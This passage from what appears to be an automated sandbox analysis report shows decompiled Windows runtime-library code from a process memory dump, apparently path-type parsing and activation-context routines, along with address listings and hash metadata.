*(_t528 - 0xb0) + 1; 														} else { 															__eflags = _t398 == 1; 															if(_t398 == 1) { 																 *(_t528 - 0xa8) =  *(_t469 - 8); 																_t402 =  *_t469 & 0x0000ffff; 																 *(_t528 - 0xac) = _t402; 																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8); 															} 														} 													} 													__eflags = _t511 -  *(_t528 - 0xe4); 													if(_t511 <  *(_t528 - 0xe4)) { 														break; 													} 													_t397 =  *(_t528 - 0x88) + 1; 													 *(_t528 - 0x88) = _t397; 													_t469 = _t469 + 0x10; 													__eflags = _t397 -  *(_t528 + 0x1c); 													_t392 =  *(_t528 - 0xa2); 													if(_t397 <  *(_t528 + 0x1c)) { 														continue; 													} 													goto L45; 												} 												_t475 = 0x216; 												 *(_t528 - 0x74) = 0x216; 												goto L45; 											} 										} else { 											asm("lock dec dword [eax+ecx*8+0x4]"); 											goto L16; 										} 									} 									_t491 = E01184CAB(_t306, _t528 - 0xa4); 									 *(_t528 - 0x74) = _t491; 									__eflags = _t491; 									if(_t491 != 0) { 										goto L91; 									} else { 										_t474 =  *((intOrPtr*)(_t528 - 0x94)); 										goto L20; 									} 								} 								L16: 								 *(_t528 - 0x74) = 0x1069; 								L93: 								_t298 =  *(_t528 - 0xd0) + 1; 								 *(_t528 - 0xd0) = _t298; 								_t474 = _t474 + _t511; 								 *((intOrPtr*)(_t528 - 0x94)) = _t474; 								_t494 = 4; 								__eflags = _t298 - _t494; 								if(_t298 >= _t494) { 									goto L100; 								} 								_t494 =  *(_t528 - 0xcc); 								_t435 = _t298; 								continue; 							} 							__eflags = _t494[2] | _t494[3]; 							if((_t494[2] | _t494[3]) == 0) { 								goto L15; 							} 							goto L12; 						} 						__eflags = _t301; 						if(_t301 != 0) { 							goto L92; 						} 						goto L10; 						L92: 						goto L93; 					} 				} else { 					
_push(0x57); 					L101: 					return E0110D130(_t427, _t494, _t511); 				} 			}                        

                                                                            0x011860c5
                                                                            0x011860c6
                                                                            0x011860cd
                                                                            0x01186114
                                                                            0x011860cf
                                                                            0x011860cf
                                                                            0x011860d4
                                                                            0x011860d5
                                                                            0x011860da
                                                                            0x011860db
                                                                            0x011860e1
                                                                            0x011860e2
                                                                            0x011860e8
                                                                            0x011860f8
                                                                            0x011860fd
                                                                            0x011860fe
                                                                            0x01186102
                                                                            0x01186104
                                                                            0x01186107
                                                                            0x01186109
                                                                            0x0118610b
                                                                            0x0118610b
                                                                            0x0118610b
                                                                            0x0118610b
                                                                            0x0118610f
                                                                            0x0118610f
                                                                            0x01186117
                                                                            0x0118611a
                                                                            0x0118611f
                                                                            0x01186125
                                                                            0x01186134
                                                                            0x01186139
                                                                            0x0118613f
                                                                            0x01186146
                                                                            0x01186148
                                                                            0x0118614b
                                                                            0x0118614d
                                                                            0x0118614f
                                                                            0x0118614f
                                                                            0x0118614f
                                                                            0x0118614f
                                                                            0x01186153
                                                                            0x01186159
                                                                            0x01186159
                                                                            0x0118615c
                                                                            0x01186163
                                                                            0x01186169
                                                                            0x0118616c
                                                                            0x01186172
                                                                            0x01186181
                                                                            0x01186186
                                                                            0x01186187
                                                                            0x0118618b
                                                                            0x01186191
                                                                            0x01186195
                                                                            0x011861a3
                                                                            0x011861bb
                                                                            0x011861c0
                                                                            0x011861c3
                                                                            0x011861cc
                                                                            0x011861d0
                                                                            0x011861dc
                                                                            0x011861de
                                                                            0x011861e1
                                                                            0x011861e4
                                                                            0x011861e6
                                                                            0x011861e8
                                                                            0x011861e8
                                                                            0x011861e8
                                                                            0x011861e8
                                                                            0x011861e6
                                                                            0x011861ec
                                                                            0x011861f3
                                                                            0x01186203
                                                                            0x01186209
                                                                            0x0118620a
                                                                            0x01186216
                                                                            0x0118621d
                                                                            0x01186227
                                                                            0x01186241
                                                                            0x01186246
                                                                            0x0118624c
                                                                            0x01186257
                                                                            0x01186259
                                                                            0x0118625c
                                                                            0x0118625e
                                                                            0x01186260
                                                                            0x01186260
                                                                            0x01186260
                                                                            0x01186260
                                                                            0x0118625e
                                                                            0x01186264
                                                                            0x01186267
                                                                            0x01186269
                                                                            0x01186315
                                                                            0x01186315
                                                                            0x0118631b
                                                                            0x0118631e
                                                                            0x01186324
                                                                            0x01186327
                                                                            0x0118632f
                                                                            0x01186330
                                                                            0x01186333
                                                                            0x0118633a
                                                                            0x0118633c
                                                                            0x01186335
                                                                            0x01186335
                                                                            0x01186335
                                                                            0x0118633f
                                                                            0x01186342
                                                                            0x0118634c
                                                                            0x01186352
                                                                            0x01186355
                                                                            0x01186355
                                                                            0x01186359
                                                                            0x00000000
                                                                            0x0118626f
                                                                            0x01186275
                                                                            0x01186275
                                                                            0x01186278
                                                                            0x0118627e
                                                                            0x0118627e
                                                                            0x01186281
                                                                            0x01186287
                                                                            0x0118628d
                                                                            0x01186298
                                                                            0x0118629c
                                                                            0x011862a2
                                                                            0x0118629e
                                                                            0x0118629e
                                                                            0x0118629e
                                                                            0x011862a7
                                                                            0x011862a7
                                                                            0x011862aa
                                                                            0x011862b0
                                                                            0x011862f0
                                                                            0x011862f0
                                                                            0x011862f2
                                                                            0x011862f8
                                                                            0x011862fd
                                                                            0x011862b2
                                                                            0x011862b2
                                                                            0x011862b2
                                                                            0x011862b5
                                                                            0x011862dd
                                                                            0x011862e2
                                                                            0x011862e5
                                                                            0x011862b7
                                                                            0x011862b8
                                                                            0x011862bb
                                                                            0x011862bd
                                                                            0x011862c0
                                                                            0x011862c4
                                                                            0x011862cd
                                                                            0x011862cd
                                                                            0x011862c0
                                                                            0x011862bb
                                                                            0x011862b5
                                                                            0x01186302
                                                                            0x01186303
                                                                            0x01186305
                                                                            0x01186305
                                                                            0x01186305
                                                                            0x0118630c
                                                                            0x0118630c
                                                                            0x00000000
                                                                            0x0118627e
                                                                            0x01186269
                                                                            0x01185eac
                                                                            0x01185ebb
                                                                            0x01185ebe
                                                                            0x01185ecb
                                                                            0x01185ecb
                                                                            0x01185ece
                                                                            0x01185ece
                                                                            0x01185ed4
                                                                            0x01185ed7
                                                                            0x01185ed9
                                                                            0x01185edb
                                                                            0x01185edb
                                                                            0x01185ee1
                                                                            0x01185ee1
                                                                            0x01185ee3
                                                                            0x01185f20
                                                                            0x01185f20
                                                                            0x01185ee5
                                                                            0x01185ee5
                                                                            0x01185ee5
                                                                            0x01185ee8
                                                                            0x01185f11
                                                                            0x01185f18
                                                                            0x01185eea
                                                                            0x01185eea
                                                                            0x01185eed
                                                                            0x01185ef2
                                                                            0x01185ef8
                                                                            0x01185efb
                                                                            0x01185f0a
                                                                            0x01185f0a
                                                                            0x01185eed
                                                                            0x01185ee8
                                                                            0x01185f22
                                                                            0x01185f28
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01185f30
                                                                            0x01185f31
                                                                            0x01185f37
                                                                            0x01185f3a
                                                                            0x01185f3d
                                                                            0x01185f44
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01185f46
                                                                            0x01185f48
                                                                            0x01185f4d
                                                                            0x00000000
                                                                            0x01185f4d
                                                                            0x01185dda
                                                                            0x01185ddf
                                                                            0x00000000
                                                                            0x01185ddf
                                                                            0x01185dd8
                                                                            0x01185da7
                                                                            0x01185da9
                                                                            0x01185dac
                                                                            0x01185dae
                                                                            0x00000000
                                                                            0x01185db4
                                                                            0x01185db4
                                                                            0x00000000
                                                                            0x01185db4
                                                                            0x01185dae
                                                                            0x01185d88
                                                                            0x01185d8d
                                                                            0x01186363
                                                                            0x01186369
                                                                            0x0118636a
                                                                            0x01186370
                                                                            0x01186372
                                                                            0x0118637a
                                                                            0x0118637b
                                                                            0x0118637d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0118637f
                                                                            0x01186385
                                                                            0x00000000
                                                                            0x01186385
                                                                            0x01185d38
                                                                            0x01185d3b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01185d3b
                                                                            0x01185d27
                                                                            0x01185d29
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01186360
                                                                            0x00000000
                                                                            0x01186360
                                                                            0x01185c10
                                                                            0x01185c10
                                                                            0x011863da
                                                                            0x011863e5
                                                                            0x011863e5

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9af4243f74ee141870300324d14fd7d3d378550d18c0cae74e66ab3348bc197a
                                                                            • Instruction ID: 1202e4e524f774d81cfa1bfeedc8cb448aad6441264b14c87682147ef6c94ed3
                                                                            • Opcode Fuzzy Hash: 9af4243f74ee141870300324d14fd7d3d378550d18c0cae74e66ab3348bc197a
                                                                            • Instruction Fuzzy Hash: FF425A75900229CFDB68DF68C880BA9BBB1FF49304F15C1AAD94DEB242E7349985CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 92%
                                                                                                                                  E010D4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) { 				signed int _v8; 				void* _v20; 				signed int _v24; 				char _v532; 				char _v540; 				signed short _v544; 				signed int _v548; 				signed short* _v552; 				signed short _v556; 				signed short* _v560; 				signed short* _v564; 				signed short* _v568; 				void* _v570; 				signed short* _v572; 				signed short _v576; 				signed int _v580; 				char _v581; 				void* _v584; 				unsigned int _v588; 				signed short* _v592; 				void* _v597; 				void* _v600; 				void* _v604; 				void* _v609; 				void* _v616; 				void* __ebx; 				void* __edi; 				void* __esi; 				char _t161; 				signed int _t162; 				unsigned int _t163; 				void* _t169; 				signed short _t173; 				signed short _t177; 				signed short _t181; 				unsigned int _t182; 				signed int _t185; 				signed int _t213; 				signed int _t225; 				short _t233; 				signed char _t234; 				signed int _t242; 				signed int _t243; 				signed int _t244; 				signed int _t245; 				signed int _t250; 				void* _t251; 				signed short* _t254; 				void* _t255; 				signed int _t256; 				void* _t257; 				signed short* _t260; 				signed short _t265; 				signed short* _t269; 				signed short _t271; 				signed short** _t272; 				signed short* _t275; 				signed short _t282; 				signed short _t283; 				signed short _t290; 				signed short _t299; 				signed short _t307; 				signed int _t308; 				signed short _t311; 				signed short* _t315; 				signed short _t316; 				void* _t317; 				void* _t319; 				signed short* _t321; 				void* _t322; 				void* _t323; 				unsigned int _t324; 				signed int _t325; 				void* _t326; 				signed int _t327; 				signed int _t329;  				_t329 = (_t327 & 0xfffffff8) - 0x24c; 				_v8 =  *0x11ad360 ^ _t329; 				_t157 = _a8; 				_t321 = 
_a4; 				_t315 = __edx; 				_v548 = __ecx; 				_t305 = _a20; 				_v560 = _a12; 				_t260 = _a16; 				_v564 = __edx; 				_v580 = _a8; 				_v572 = _t260; 				_v544 = _a20; 				if( *__edx <= 8) { 					L3: 					if(_t260 != 0) { 						 *_t260 = 0; 					} 					_t254 =  &_v532; 					_v588 = 0x208; 					if((_v548 & 0x00000001) != 0) { 						_v556 =  *_t315; 						_v552 = _t315[2]; 						_t161 = E010EF232( &_v556); 						_t316 = _v556; 						_v540 = _t161; 						goto L17; 					} else { 						_t306 = 0x208; 						_t298 = _t315; 						_t316 = E010D6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540); 						if(_t316 == 0) { 							L68: 							_t322 = 0xc0000033; 							goto L39; 						} else { 							while(_v581 == 0) { 								_t233 = _v588; 								if(_t316 > _t233) { 									_t234 = _v548; 									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) { 										_t254 = L010D4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316); 										if(_t254 == 0) { 											_t169 = 0xc0000017; 										} else { 											_t298 = _v564; 											_v588 = _t316; 											_t306 = _t316; 											_t316 = E010D6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540); 											if(_t316 != 0) { 												continue; 											} else { 												goto L68; 											} 										} 									} else { 										goto L90; 									} 								} else { 									_v556 = _t316; 									 *((short*)(_t329 + 0x32)) = _t233; 									_v552 = _t254; 									if(_t316 < 2) { 										L11: 										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) { 											_t161 = 5; 										} else { 											if(_t316 < 6) { 												L87: 												_t161 = 3; 											} else { 												_t242 = _t254[2] & 0x0000ffff; 												if(_t242 != 0x5c) { 													if(_t242 == 0x2f) { 														goto L16; 													} else { 														goto L87; 													} 													goto L101; 												} else { 													L16: 													_t161 = 2; 			
									} 											} 										} 									} else { 										_t243 =  *_t254 & 0x0000ffff; 										if(_t243 == 0x5c || _t243 == 0x2f) { 											if(_t316 < 4) { 												L81: 												_t161 = 4; 												goto L17; 											} else { 												_t244 = _t254[1] & 0x0000ffff; 												if(_t244 != 0x5c) { 													if(_t244 == 0x2f) { 														goto L60; 													} else { 														goto L81; 													} 												} else { 													L60: 													if(_t316 < 6) { 														L83: 														_t161 = 1; 														goto L17; 													} else { 														_t245 = _t254[2] & 0x0000ffff; 														if(_t245 != 0x2e) { 															if(_t245 == 0x3f) { 																goto L62; 															} else { 																goto L83; 															} 														} else { 															L62: 															if(_t316 < 8) { 																L85: 																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1; 																goto L17; 															} else { 																_t250 = _t254[3] & 0x0000ffff; 																if(_t250 != 0x5c) { 																	if(_t250 == 0x2f) { 																		goto L64; 																	} else { 																		goto L85; 																	} 																} else { 																	L64: 																	_t161 = 6; 																	goto L17; 																} 															} 														} 													} 												} 											} 											goto L101; 										} else { 											goto L11; 										} 									} 									L17: 									if(_t161 != 2) { 										_t162 = _t161 - 1; 										if(_t162 > 5) { 											goto L18; 										} else { 											switch( *((intOrPtr*)(_t162 * 4 +  &M010D45F8))) { 												case 0: 													_v568 = 0x1091078; 													__eax = 2; 													goto L20; 												case 1: 													goto L18; 												case 2: 													_t163 = 4; 													goto L19; 											} 										} 										goto L41; 									} 
else { 										L18: 										_t163 = 0; 										L19: 										_v568 = 0x10911c4; 									} 									L20: 									_v588 = _t163; 									_v564 = _t163 + _t163; 									_t306 =  *_v568 & 0x0000ffff; 									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff); 									_v576 = _t265; 									if(_t265 > 0xfffe) { 										L90: 										_t322 = 0xc0000106; 									} else { 										if(_t321 != 0) { 											if(_t265 > (_t321[1] & 0x0000ffff)) { 												if(_v580 != 0) { 													goto L23; 												} else { 													_t322 = 0xc0000106; 													goto L39; 												} 											} else { 												_t177 = _t306; 												goto L25; 											} 											goto L101; 										} else { 											if(_v580 == _t321) { 												_t322 = 0xc000000d; 											} else { 												L23: 												_t173 = L010D4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265); 												_t269 = _v592; 												_t269[2] = _t173; 												if(_t173 == 0) { 													_t322 = 0xc0000017; 												} else { 													_t316 = _v556; 													 *_t269 = 0; 													_t321 = _t269; 													_t269[1] = _v576; 													_t177 =  *_v568 & 0x0000ffff; 													L25: 													_v580 = _t177; 													if(_t177 == 0) { 														L29: 														_t307 =  *_t321 & 0x0000ffff; 													} else { 														_t290 =  *_t321 & 0x0000ffff; 														_v576 = _t290; 														_t310 = _t177 & 0x0000ffff; 														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) { 															_t307 =  *_t321 & 0xffff; 														} else { 															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2; 															E010FF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310); 															_t329 = _t329 + 0xc; 															_t311 = _v580; 															_t225 =  *_t321 + _t311 & 0x0000ffff; 															 *_t321 = _t225; 															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) { 	
															 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0; 															} 															goto L29; 														} 													} 													_t271 = _v556 - _v588 + _v588; 													_v580 = _t307; 													_v576 = _t271; 													if(_t271 != 0) { 														_t308 = _t271 & 0x0000ffff; 														_v588 = _t308; 														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) { 															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2; 															E010FF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308); 															_t329 = _t329 + 0xc; 															_t213 =  *_t321 + _v576 & 0x0000ffff; 															 *_t321 = _t213; 															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) { 																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0; 															} 														} 													} 													_t272 = _v560; 													if(_t272 != 0) { 														 *_t272 = _t321; 													} 													_t306 = 0; 													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0; 													_t275 = _v572; 													if(_t275 != 0) { 														_t306 =  *_t275; 														if(_t306 != 0) { 															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2]; 														} 													} 													_t181 = _v544; 													if(_t181 != 0) { 														 *_t181 = 0; 														 *((intOrPtr*)(_t181 + 4)) = 0; 														 *((intOrPtr*)(_t181 + 8)) = 0; 														 *((intOrPtr*)(_t181 + 0xc)) = 0; 														if(_v540 == 5) { 															_t182 = E010B52A5(1); 															_v588 = _t182; 															if(_t182 == 0) { 																E010CEB70(1, 0x11a79a0); 																goto L38; 															} else { 																_v560 = _t182 + 0xc; 																_t185 = E010CAA20( &_v556, _t182 + 0xc,  &_v556, 1); 																if(_t185 == 0) { 																	_t324 = _v588; 																	goto L97; 																} else { 																	
_t306 = _v544; 																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2]; 																	 *(_t306 + 4) = _t282; 																	_v576 = _t282; 																	_t325 = _t316 -  *_v560 & 0x0000ffff; 																	 *_t306 = _t325; 																	if( *_t282 == 0x5c) { 																		_t149 = _t325 - 2; // -2 																		_t283 = _t149; 																		 *_t306 = _t283; 																		 *(_t306 + 4) = _v576 + 2; 																		_t185 = _t283 & 0x0000ffff; 																	} 																	_t324 = _v588; 																	 *(_t306 + 2) = _t185; 																	if((_v548 & 0x00000002) == 0) { 																		L97: 																		asm("lock xadd [esi], eax"); 																		if((_t185 | 0xffffffff) == 0) { 																			_push( *((intOrPtr*)(_t324 + 4))); 																			E010F95D0(); 																			L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324); 																		} 																	} else { 																		 *(_t306 + 0xc) = _t324; 																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4)); 																	} 																	goto L38; 																} 															} 															goto L41; 														} 													} 													L38: 													_t322 = 0; 												} 											} 										} 									} 									L39: 									if(_t254 !=  &_v532) { 										L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254); 									} 									_t169 = _t322; 								} 								goto L41; 							} 							goto L68; 						} 					} 					L41: 					_pop(_t317); 					_pop(_t323); 					_pop(_t255); 					return E010FB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323); 				} else { 					_t299 = __edx[2]; 					if( *_t299 == 0x5c) { 						_t256 =  *(_t299 + 2) & 0x0000ffff; 						if(_t256 != 0x5c) { 							if(_t256 != 0x3f) { 								goto L2; 							} else { 								goto L50; 							} 						} else { 							L50: 							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 
0x5c) { 								goto L2; 							} else { 								_t251 = E010F3D43(_t315, _t321, _t157, _v560, _v572, _t305); 								_pop(_t319); 								_pop(_t326); 								_pop(_t257); 								return E010FB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326); 							} 						} 					} else { 						L2: 						_t260 = _v572; 						goto L3; 					} 				} 				L101: 			}                        

                                                                            0x010d4282
                                                                            0x010d4407
                                                                            0x010d440d
                                                                            0x0111e2af
                                                                            0x0111e2af
                                                                            0x010d4413
                                                                            0x010d4413
                                                                            0x00000000
                                                                            0x010d41d4
                                                                            0x00000000
                                                                            0x010d41c3
                                                                            0x010d41bd
                                                                            0x010d4415
                                                                            0x010d4415
                                                                            0x010d4416
                                                                            0x010d4417
                                                                            0x010d4429
                                                                            0x010d416e
                                                                            0x010d416e
                                                                            0x010d4175
                                                                            0x010d4498
                                                                            0x010d449f
                                                                            0x0111e12d
                                                                            0x00000000
                                                                            0x0111e133
                                                                            0x00000000
                                                                            0x0111e133
                                                                            0x010d44a5
                                                                            0x010d44a5
                                                                            0x010d44aa
                                                                            0x00000000
                                                                            0x010d44bb
                                                                            0x010d44ca
                                                                            0x010d44d6
                                                                            0x010d44d7
                                                                            0x010d44d8
                                                                            0x010d44e3
                                                                            0x010d44e3
                                                                            0x010d44aa
                                                                            0x010d417b
                                                                            0x010d417b
                                                                            0x010d417b
                                                                            0x00000000
                                                                            0x010d417b
                                                                            0x010d4175
                                                                            0x00000000

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • Opcode ID: a80b26405b9b901e7b51bee3005d4a706fc16adba2a08d054ef22d1736ebb1d4
                                                                            • Instruction ID: e9b5c896add012df5e15cf041644e401150859f91a8728783661305f0812ffea
                                                                            • Opcode Fuzzy Hash: a80b26405b9b901e7b51bee3005d4a706fc16adba2a08d054ef22d1736ebb1d4
                                                                            • Instruction Fuzzy Hash: 12F16B706083118BC729CF59C490A7ABBE1FF88714F44896EF9C6CBA51EB34D885CB52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 92%
                                                                                                                                  E010E20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) { 				signed int _v16; 				signed int _v20; 				signed char _v24; 				intOrPtr _v28; 				signed int _v32; 				void* _v36; 				char _v48; 				signed int _v52; 				signed int _v56; 				unsigned int _v60; 				char _v64; 				unsigned int _v68; 				signed int _v72; 				char _v73; 				signed int _v74; 				char _v75; 				signed int _v76; 				void* _v81; 				void* _v82; 				void* _v89; 				void* _v92; 				void* _v97; 				void* __edi; 				void* __esi; 				void* __ebp; 				signed char _t128; 				void* _t129; 				signed int _t130; 				void* _t132; 				signed char _t133; 				intOrPtr _t135; 				signed int _t137; 				signed int _t140; 				signed int* _t144; 				signed int* _t145; 				intOrPtr _t146; 				signed int _t147; 				signed char* _t148; 				signed int _t149; 				signed int _t153; 				signed int _t169; 				signed int _t174; 				signed int _t180; 				void* _t197; 				void* _t198; 				signed int _t201; 				intOrPtr* _t202; 				intOrPtr* _t205; 				signed int _t210; 				signed int _t215; 				signed int _t218; 				signed char _t221; 				signed int _t226; 				char _t227; 				signed int _t228; 				void* _t229; 				unsigned int _t231; 				void* _t235; 				signed int _t240; 				signed int _t241; 				void* _t242; 				signed int _t246; 				signed int _t248; 				signed int _t252; 				signed int _t253; 				void* _t254; 				intOrPtr* _t256; 				intOrPtr _t257; 				unsigned int _t262; 				signed int _t265; 				void* _t267; 				signed int _t275;  				_t198 = __ebx; 				_t267 = (_t265 & 0xfffffff0) - 0x48; 				_v68 = __ecx; 				_v73 = 0; 				_t201 = __edx & 0x00002000; 				_t128 = __edx & 0xffffdfff; 				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000; 				_v72 = _t128; 				if((_t128 & 0x00000008) != 0) { 		
			__eflags = _t128 - 8; 					if(_t128 != 8) { 						L69: 						_t129 = 0xc000000d; 						goto L23; 					} else { 						_t130 = 0; 						_v72 = 0; 						_v75 = 1; 						L2: 						_v74 = 1; 						_t226 =  *0x11a8714; // 0x0 						if(_t226 != 0) { 							__eflags = _t201; 							if(_t201 != 0) { 								L62: 								_v74 = 1; 								L63: 								_t130 = _t226 & 0xffffdfff; 								_v72 = _t130; 								goto L3; 							} 							_v74 = _t201; 							__eflags = _t226 & 0x00002000; 							if((_t226 & 0x00002000) == 0) { 								goto L63; 							} 							goto L62; 						} 						L3: 						_t227 = _v75; 						L4: 						_t240 = 0; 						_v56 = 0; 						_t252 = _t130 & 0x00000100; 						if(_t252 != 0 || _t227 != 0) { 							_t240 = _v68; 							_t132 = E010E2EB0(_t240); 							__eflags = _t132 - 2; 							if(_t132 != 2) { 								__eflags = _t132 - 1; 								if(_t132 == 1) { 									goto L25; 								} 								__eflags = _t132 - 6; 								if(_t132 == 6) { 									__eflags =  *((short*)(_t240 + 4)) - 0x3f; 									if( *((short*)(_t240 + 4)) != 0x3f) { 										goto L40; 									} 									_t197 = E010E2EB0(_t240 + 8); 									__eflags = _t197 - 2; 									if(_t197 == 2) { 										goto L25; 									} 								} 								L40: 								_t133 = 1; 								L26: 								_t228 = _v75; 								_v56 = _t240; 								__eflags = _t133; 								if(_t133 != 0) { 									__eflags = _t228; 									if(_t228 == 0) { 										L43: 										__eflags = _v72; 										if(_v72 == 0) { 											goto L8; 										} 										goto L69; 									} 									_t133 = E010B58EC(_t240); 									_t221 =  *0x11a5cac; // 0x16 									__eflags = _t221 & 0x00000040; 									if((_t221 & 0x00000040) != 0) { 										_t228 = 0; 										__eflags = _t252; 										if(_t252 != 0) { 											goto L43; 										} 										_t133 = _v72; 										goto L7; 									} 									goto L43; 								} else { 									_t133 = _v72; 									goto L6; 								} 							} 							L25: 							_t133 = _v73; 
							goto L26; 						} else { 							L6: 							_t221 =  *0x11a5cac; // 0x16 							L7: 							if(_t133 != 0) { 								__eflags = _t133 & 0x00001000; 								if((_t133 & 0x00001000) != 0) { 									_t133 = _t133 | 0x00000a00; 									__eflags = _t221 & 0x00000004; 									if((_t221 & 0x00000004) != 0) { 										_t133 = _t133 | 0x00000400; 									} 								} 								__eflags = _t228; 								if(_t228 != 0) { 									_t133 = _t133 | 0x00000100; 								} 								_t229 = E010F4A2C(0x11a6e40, 0x10f4b30, _t133, _t240); 								__eflags = _t229; 								if(_t229 == 0) { 									_t202 = _a20; 									goto L100; 								} else { 									_t135 =  *((intOrPtr*)(_t229 + 0x38)); 									L15: 									_t202 = _a20; 									 *_t202 = _t135; 									if(_t229 == 0) { 										L100: 										 *_a4 = 0; 										_t137 = _a8; 										__eflags = _t137; 										if(_t137 != 0) { 											 *_t137 = 0; 										} 										 *_t202 = 0; 										_t129 = 0xc0000017; 										goto L23; 									} else { 										_t242 = _a16; 										if(_t242 != 0) { 											_t254 = _t229; 											memcpy(_t242, _t254, 0xd << 2); 											_t267 = _t267 + 0xc; 											_t242 = _t254 + 0x1a; 										} 										_t205 = _a4; 										_t25 = _t229 + 0x48; // 0x48 										 *_t205 = _t25; 										_t140 = _a8; 										if(_t140 != 0) { 											__eflags =  *((char*)(_t267 + 0xa)); 											if( *((char*)(_t267 + 0xa)) != 0) { 												 *_t140 =  *((intOrPtr*)(_t229 + 0x44)); 											} else { 												 *_t140 = 0; 											} 										} 										_t256 = _a12; 										if(_t256 != 0) { 											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c)); 										} 										_t257 =  *_t205; 										_v48 = 0; 										 *((intOrPtr*)(_t267 + 0x2c)) = 0; 										_v56 = 0; 										_v52 = 0; 										_t144 =  *( *[fs:0x30] + 0x50); 										if(_t144 != 0) { 											__eflags =  *_t144; 											if( *_t144 == 0) { 												goto L20; 											} 											
_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]); 											goto L21; 										} else { 											L20: 											_t145 = 0x7ffe0384; 											L21: 											if( *_t145 != 0) { 												_t146 =  *[fs:0x30]; 												__eflags =  *(_t146 + 0x240) & 0x00000004; 												if(( *(_t146 + 0x240) & 0x00000004) != 0) { 													_t147 = E010D7D50(); 													__eflags = _t147; 													if(_t147 == 0) { 														_t148 = 0x7ffe0385; 													} else { 														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]); 													} 													__eflags =  *_t148 & 0x00000020; 													if(( *_t148 & 0x00000020) != 0) { 														_t149 = _v72; 														__eflags = _t149; 														if(__eflags == 0) { 															_t149 = 0x1095c80; 														} 														_push(_t149); 														_push( &_v48); 														 *((char*)(_t267 + 0xb)) = E010EF6E0(_t198, _t242, _t257, __eflags); 														_push(_t257); 														_push( &_v64); 														_t153 = E010EF6E0(_t198, _t242, _t257, __eflags); 														__eflags =  *((char*)(_t267 + 0xb)); 														if( *((char*)(_t267 + 0xb)) != 0) { 															__eflags = _t153; 															if(_t153 != 0) { 																__eflags = 0; 																E01137016(0x14c1, 0, 0, 0,  &_v72,  &_v64); 																L010D2400(_t267 + 0x20); 															} 															L010D2400( &_v64); 														} 													} 												} 											} 											_t129 = 0; 											L23: 											return _t129; 										} 									} 								} 							} 							L8: 							_t275 = _t240; 							if(_t275 != 0) { 								_v73 = 0; 								_t253 = 0; 								__eflags = 0; 								L29: 								_push(0); 								_t241 = E010E2397(_t240); 								__eflags = _t241; 								if(_t241 == 0) { 									_t229 = 0; 									L14: 									_t135 = 0; 									goto L15; 								} 								__eflags =  *((char*)(_t267 + 0xb)); 								 *(_t241 + 0x34) = 1; 								if( *((char*)(_t267 + 0xb)) != 0) { 									
